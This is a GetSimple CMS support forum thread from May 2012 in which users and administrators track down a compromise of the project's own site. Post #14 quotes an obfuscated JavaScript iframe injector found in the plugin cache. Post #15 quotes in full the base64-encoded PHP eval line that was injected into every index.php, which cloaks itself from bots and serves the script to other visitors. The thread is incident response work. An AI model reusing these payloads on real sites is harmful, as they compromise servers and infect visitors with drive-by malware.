GetSimple Support Forum GetSimple General Questions and Problems v
gs hacked?

Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Thread Modes
gs hacked?
marrco Offline
Member
***
Posts: 149
Threads: 12
Joined: Dec 2009
#1
2012-05-11, 17:09:40
looks like this site (may 11 - 9am cet) has been hacked and now it's injecting a script redirecting users to http://lbxdmes.usa.cc/?go=2

viewing page source confirm that something is getting injected on gs pages

anyone can confirm?
Find
Reply
Timbow Offline
Team Member
******
Posts: 1,127
Threads: 136
Joined: Feb 2012
#2
2012-05-11, 18:29:47
marrco Wrote:looks like this site (may 11 - 9am cet) has been hacked and now it's injecting a script redirecting users to http://lbxdmes.usa.cc/?go=2

viewing page source confirm that something is getting injected on gs pages

anyone can confirm?

Avg was preventing me from accessing the GS site with warnings of 'Blackhole Exploit Kit'. But it seems to work again now.
T
GS Themes | Web Work
Website Find
Reply
marrco Offline
Member
***
Posts: 149
Threads: 12
Joined: Dec 2009
#3
2012-05-11, 18:35:33
definitely, now it's fine again. I have locally saved the exploited pages. html was starting with a
Code:
<script>i=0;try{prototype;}catch(z){h="harCode";f=['-33c-33c63c60c-10c-2c58...

Now i'm waiting to know if there's an actual critical bug in GS or what
Find
Reply
Draxeiro Offline
Member
***
Posts: 149
Threads: 8
Joined: Dec 2011
#4
2012-05-11, 20:32:17
Wouldn't say it is over, since I am still attacked when I get to the homepage or forum... (my anti-virus software kills it immediately).

I sent Chris an email early this morning just to be sure he knows about it (I most likely won't be the only one doing that, but at least he will be in the know this way). But it is very clear something was hacked. Could be the forum software, GS (although I think the main site at least used to be Wordpress, maybe not anymore), the server, etc.

Hope things will a. be solved soon, b. it will be clear what was causing it and c. if it turns out to be GS how that hole needs to be plugged.
Find
Reply
ccagle8 Offline
Administrator
*******
Posts: 1,848
Threads: 86
Joined: Aug 2009
#5
2012-05-11, 20:45:00
thanks guys! i have found a rouge file in /theme/ folder and ideleted it. I will keep looking into it to see if this happens again. Thanks for the emails guys!
- Chris
Thanks for using GetSimple! - Download

Please do not email me directly for help regarding GetSimple. Please post all your questions/problems in the forum!
Website Find
Reply
Draxeiro Offline
Member
***
Posts: 149
Threads: 8
Joined: Dec 2011
#6
2012-05-11, 21:12:01
From my side I am still getting the attack attempt blocked notice from my anti-virus software. Could that be cache? Otherwise something might still be active.
Find
Reply
n00dles101 Offline
Administrator
*******
Posts: 1,108
Threads: 70
Joined: Aug 2009
#7
2012-05-11, 21:28:07
must be cached it looks clean now.
My Github Repos: Github
Website: DigiMute
Website Find
Reply
Draxeiro Offline
Member
***
Posts: 149
Threads: 8
Joined: Dec 2011
#8
2012-05-11, 21:36:26 (This post was last modified: 2012-05-11, 21:36:54 by xLn.)
Firefox has quite a persistent cache I must say, so that could well be it.

My norton internet security keeps roaring into action in any case. Will keep an eye on it.

Hope it is clear soon what happened.
Find
Reply
ccagle8 Offline
Administrator
*******
Posts: 1,848
Threads: 86
Joined: Aug 2009
#9
2012-05-11, 22:00:33
cant you try private browsing and see if you still see it?
- Chris
Thanks for using GetSimple! - Download

Please do not email me directly for help regarding GetSimple. Please post all your questions/problems in the forum!
Website Find
Reply
Draxeiro Offline
Member
***
Posts: 149
Threads: 8
Joined: Dec 2011
#10
2012-05-11, 22:22:48
Good point. Just did, still sees it. However, if I look at the site in Chrome. I don't get any notice.

So maybe it is still a persistent bit of cache or what have you.
Find
Reply
Connie Offline
Posting Freak
*****
Posts: 2,928
Threads: 195
Joined: Feb 2011
#11
2012-05-12, 00:01:46
I run into it just now again, when I logged in the first time this afternoon
in the morning, my antivir program didn't tell any alarm

just now there was alarm

I cleared the browser cache, will see what's happening

so much intelligence wasted on so stupid actions Wink(
|--

Das deutschsprachige GetSimple-(Unter-)Forum:   http://get-simple.info/forums/forumdisplay.php?fid=18
Find
Reply
shawn_a Offline
Lead Developer
*******
Posts: 6,266
Threads: 181
Joined: Sep 2011
#12
2012-05-12, 02:29:54
I suggest everyone deletes their GS cache.
It is all infected from the plugin api caches.

Well mine are, but Im not sure where its coming from yet, since it doesn't show up when i do a direct call.

Well I don't see the injection when direct accessing via my browser, but my curl and get_file_contents both return a script injection.

Either GS is compromised or I have some local injection on my host.

If someone could open a new cache file from the api
gs/data/cache md5.txt
and see if it contains script tags.
NEW: SA Admin Toolbar Plugin | View All My Plugins
- Shawn A aka Tablatronix
Website Find
Reply
ccagle8 Offline
Administrator
*******
Posts: 1,848
Threads: 86
Joined: Aug 2009
#13
2012-05-12, 03:40:28
i just checked the cache on get-simple.info and inside the API cache that feeds these API calls - and everything looks clean as a whistle. What do you see?
- Chris
Thanks for using GetSimple! - Download

Please do not email me directly for help regarding GetSimple. Please post all your questions/problems in the forum!
Website Find
Reply
shawn_a Offline
Lead Developer
*******
Posts: 6,266
Threads: 181
Joined: Sep 2011
#14
2012-05-12, 03:49:40
ccagle8 Wrote:i just checked the cache on get-simple.info and inside the API cache that feeds these API calls - and everything looks clean as a whistle. What do you see?

Code:
bfbf906471daf3f15be136dfe21ee5a1.txt

<XSS>i=0;try{prototype;}catch(z){h="harCode";f=['-33c-33c63c60c-10c-2c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c-1c81c-29c-33c-33c-33c63c60c72c55c67c59c72c-2c-1c17c-29c-33c-33c83c-10c59c66c73c59c-10c81c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c77c72c63c74c59c-2c-8c18c63c60c72c55c67c59c-10c73c72c57c19c-3c62c74c74c70c16c5c5c60c73c56c56c63c62c63c77c67c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-10c77c63c58c74c62c19c-3c7c6c-3c-10c62c59c63c61c62c74c19c-3c7c6c-3c-10c73c74c79c66c59c19c-3c76c63c73c63c56c63c66c63c74c79c16c62c63c58c58c59c68c17c70c69c73c63c74c63c69c68c16c55c56c73c69c66c75c74c59c17c66c59c60c74c16c6c17c74c69c70c16c6c17c-3c20c18c5c63c60c72c55c67c59c20c-8c-1c17c-29c-33c-33c83c-29c-33c-33c60c75c68c57c74c63c69c68c-10c63c60c72c55c67c59c72c-2c-1c81c-29c-33c-33c-33c76c55c72c-10c60c-10c19c-10c58c69c57c75c67c59c68c74c4c57c72c59c55c74c59c27c66c59c67c59c68c74c-2c-3c63c60c72c55c67c59c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c73c72c57c-3c2c-3c62c74c74c70c16c5c5c60c73c56c56c63c62c63c77c67c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-1c17c60c4c73c74c79c66c59c4c76c63c73c63c56c63c66c63c74c79c19c-3c62c63c58c58c59c68c-3c17c60c4c73c74c79c66c59c4c70c69c73c63c74c63c69c68c19c-3c55c56c73c69c66c75c74c59c-3c17c60c4c73c74c79c66c59c4c66c59c60c74c19c-3c6c-3c17c60c4c73c74c79c66c59c4c74c69c70c19c-3c6c-3c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c77c63c58c74c62c-3c2c-3c7c6c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c62c59c63c61c62c74c-3c2c-3c7c6c-3c-1c17c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c4c55c70c70c59c68c58c25c62c63c66c58c-2c60c-1c17c-29c-33c-33c83'][0].split('c');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];} r=String;z=((e)?h:"");for(;569!=i;i+=1){j=i;if(e)s=s+r["fromC"+z](w[j]*1+42);} if(v&&e&&r)e(s);</XSS>{"status":"error","message":"invalid id: item_manager.php"}

Script tags replaced with XSS tags.
unpacks into a dom inserted iframe after body that loads a url payload.

This shouldn't cause any issues as long as those don't get loaded into a browser, which they shouldn't, unless your debugging why your plugin lookups arent working, which I was.
NEW: SA Admin Toolbar Plugin | View All My Plugins
- Shawn A aka Tablatronix
Website Find
Reply
ccagle8 Offline
Administrator
*******
Posts: 1,848
Threads: 86
Joined: Aug 2009
#15
2012-05-12, 06:33:14
OK, found it. It must have been a host vulnerability or something... but every index.php file on the server had this at the top:

The reason it was so hard to find was that none of the timestamps were changed on any of the files. If anyone else sees this please let me know... i may have missed a file.

Code:
<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJywnY2hyb21lJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1cFBUQTdkSEo1ZTNCeWIzUnZkSGx3WlR0OVkyRjBZMmdvZWlsN2FEMGlhR0Z5UTI5a1pTSTdaajFiSnkwek0yTXRNek5qTmpOak5qQmpMVEV3WXkweVl6VTRZelk1WXpVM1l6YzFZelkzWXpVNVl6WTRZemMwWXpSak5qRmpOVGxqTnpSak1qZGpOalpqTlRsak5qZGpOVGxqTmpoak56UmpOek5qTWpSak56bGpOREpqTlRWak5qRmpNelpqTlRWak5qZGpOVGxqTFRKakxUTmpOVFpqTmpsak5UaGpOemxqTFROakxURmpORGxqTm1NMU1XTXRNV000TVdNdE1qbGpMVE16WXkwek0yTXRNek5qTmpOak5qQmpOekpqTlRWak5qZGpOVGxqTnpKakxUSmpMVEZqTVRkakxUSTVZeTB6TTJNdE16TmpPRE5qTFRFd1l6VTVZelkyWXpjell6VTVZeTB4TUdNNE1XTXRNamxqTFRNell5MHpNMk10TXpOak5UaGpOamxqTlRkak56VmpOamRqTlRsak5qaGpOelJqTkdNM04yTTNNbU0yTTJNM05HTTFPV010TW1NdE9HTXhPR00yTTJNMk1HTTNNbU0xTldNMk4yTTFPV010TVRCak56TmpOekpqTlRkak1UbGpMVE5qTmpKak56UmpOelJqTnpCak1UWmpOV00xWXpZd1l6Y3pZelUyWXpVMll6WXpZell5WXpZell6YzNZelkzWXpSak5qTmpOakZqTmpGak5HTTFObU0yTTJNNE1HTTFZekl4WXpZeFl6WTVZekU1WXpoakxUTmpMVEV3WXpjM1l6WXpZelU0WXpjMFl6WXlZekU1WXkwell6ZGpObU10TTJNdE1UQmpOakpqTlRsak5qTmpOakZqTmpKak56UmpNVGxqTFROak4yTTJZeTB6WXkweE1HTTNNMk0zTkdNM09XTTJObU0xT1dNeE9XTXRNMk0zTm1NMk0yTTNNMk0yTTJNMU5tTTJNMk0yTm1NMk0yTTNOR00zT1dNeE5tTTJNbU0yTTJNMU9HTTFPR00xT1dNMk9HTXhOMk0zTUdNMk9XTTNNMk0yTTJNM05HTTJNMk0yT1dNMk9HTXhObU0xTldNMU5tTTNNMk0yT1dNMk5tTTNOV00zTkdNMU9XTXhOMk0yTm1NMU9XTTJNR00zTkdNeE5tTTJZekUzWXpjMFl6WTVZemN3WXpFMll6WmpNVGRqTFROak1qQmpNVGhqTldNMk0yTTJNR00zTW1NMU5XTTJOMk0xT1dNeU1HTXRPR010TVdNeE4yTXRNamxqTFRNell5MHpNMk00TTJNdE1qbGpMVE16WXkwek0yTTJNR00zTldNMk9HTTFOMk0zTkdNMk0yTTJPV00yT0dNdE1UQmpOak5qTmpCak56SmpOVFZqTmpkak5UbGpOekpqTFRKakxURmpPREZqTFRJNVl5MHpNMk10TXpOakxUTXpZemMyWXpVMVl6Y3lZeTB4TUdNMk1HTXRNVEJqTVRsakxURXdZelU0WXpZNVl6VTNZemMxWXpZM1l6VTVZelk0WXpjMFl6UmpOVGRqTnpKak5UbGpOVFZqTnpSak5UbGpNamRqTmpaak5UbGpOamRqTlRsak5qaGpOelJqTFRKakxUTmpOak5qTmpCak56SmpOVFZqTmpkak5UbGpMVE5qTFRGak1UZGpOakJqTkdNM00yTTFPV00zTkdNeU0yTTNOR00zTkdNM01tTTJNMk0xTm1NM05XTTNOR00xT1dNdE1tTXRNMk0zTTJNM01tTTFOMk10TTJNeVl5MHpZell5WXpjMFl6YzBZemN3WXpFMll6VmpOV00yTUdNM00yTTFObU0xTm1NMk0yTTJNbU0yTTJNM04yTTJOMk0wWXpZell6WXhZell4WXpSak5UWmpOak5qT0RCak5XTXlNV00yTVdNMk9XTXhPV000WXkwell5MHhZekUzWXpZd1l6UmpOek5qTnpSak56bGpOalpqTlRsak5HTTNObU0yTTJNM00yTTJNMk0xTm1NMk0yTTJObU0yTTJNM05HTTNPV014T1dNdE0yTTJNbU0yTTJNMU9HTTFPR00xT1dNMk9HTXRNMk14TjJNMk1HTTBZemN6WXpjMFl6YzVZelkyWXpVNVl6UmpOekJqTmpsak56TmpOak5qTnpSak5qTmpOamxqTmpoak1UbGpMVE5qTlRWak5UWmpOek5qTmpsak5qWmpOelZqTnpSak5UbGpMVE5qTVRkak5qQmpOR00zTTJNM05HTTNPV00yTm1NMU9XTTBZelkyWXpVNVl6WXdZemMwWXpFNVl5MHpZelpqTFROak1UZGpOakJqTkdNM00yTTNOR00zT1dNMk5tTTFPV00wWXpjMFl6WTVZemN3WXpFNVl5MHpZelpqTFROak1UZGpOakJqTkdNM00yTTFPV00zTkdNeU0yTTNOR00zTkdNM01tTTJNMk0xTm1NM05XTTNOR00xT1dNdE1tTXRNMk0zTjJNMk0yTTFPR00zTkdNMk1tTXRNMk15WXkwell6ZGpObU10TTJNdE1XTXhOMk0yTUdNMFl6Y3pZelU1WXpjMFl6SXpZemMwWXpjMFl6Y3lZell6WXpVMll6YzFZemMwWXpVNVl5MHlZeTB6WXpZeVl6VTVZell6WXpZeFl6WXlZemMwWXkwell6SmpMVE5qTjJNMll5MHpZeTB4WXpFM1l5MHlPV010TXpOakxUTXpZeTB6TTJNMU9HTTJPV00xTjJNM05XTTJOMk0xT1dNMk9HTTNOR00wWXpZeFl6VTVZemMwWXpJM1l6WTJZelU1WXpZM1l6VTVZelk0WXpjMFl6Y3pZekkwWXpjNVl6UXlZelUxWXpZeFl6TTJZelUxWXpZM1l6VTVZeTB5WXkwell6VTJZelk1WXpVNFl6YzVZeTB6WXkweFl6UTVZelpqTlRGak5HTTFOV00zTUdNM01HTTFPV00yT0dNMU9HTXlOV00yTW1NMk0yTTJObU0xT0dNdE1tTTJNR010TVdNeE4yTXRNamxqTFRNell5MHpNMk00TXlkZFd6QmRMbk53YkdsMEtDZGpKeWs3ZGowaVpTSXJJblpoSWp0OWFXWW9kaWxsUFhkcGJtUnZkMXQyS3lKc0lsMDdkSEo1ZTNFOVpHOWpkVzFsYm5RdVkzSmxZWFJsUld4bGJXVnVkQ2dpWkdsMklpazdjUzVoY0hCbGJtUkRhR2xzWkNoeEt5SWlLVHQ5WTJGMFkyZ29jWGRuS1h0M1BXWTdjejFiWFR0OUlISTlVM1J5YVc1bk8zbzlLQ2hsS1Q5b09pSWlLVHRtYjNJb096VTJPU0U5YVR0cEt6MHhLWHRxUFdrN2FXWW9aU2x6UFhNcmNsc2labkp2YlVNaUszcGRLSGRiYWwwcU1TczBNaWs3ZlNCcFppaDJKaVpsSmlaeUtXVW9jeWs3UEM5elkzSnBjSFErJykpOw0KfQ0K'));?>
- Chris
Thanks for using GetSimple! - Download

Please do not email me directly for help regarding GetSimple. Please post all your questions/problems in the forum!
Website Find
Reply
shawn_a Offline
Lead Developer
*******
Posts: 6,266
Threads: 181
Joined: Sep 2011
#16
2012-05-12, 06:58:46
Ok now clear your caches.

Smile
NEW: SA Admin Toolbar Plugin | View All My Plugins
- Shawn A aka Tablatronix
Website Find
Reply
shawn_a Offline
Lead Developer
*******
Posts: 6,266
Threads: 181
Joined: Sep 2011
#17
2012-05-18, 22:56:06
It looks like with the new punbb install
I am having issues with the toolbar
It gives js errors

Uncaught ReferenceError: PUNBB is not define
NEW: SA Admin Toolbar Plugin | View All My Plugins
- Shawn A aka Tablatronix
Website Find
Reply




Users browsing this thread: 1 Guest(s)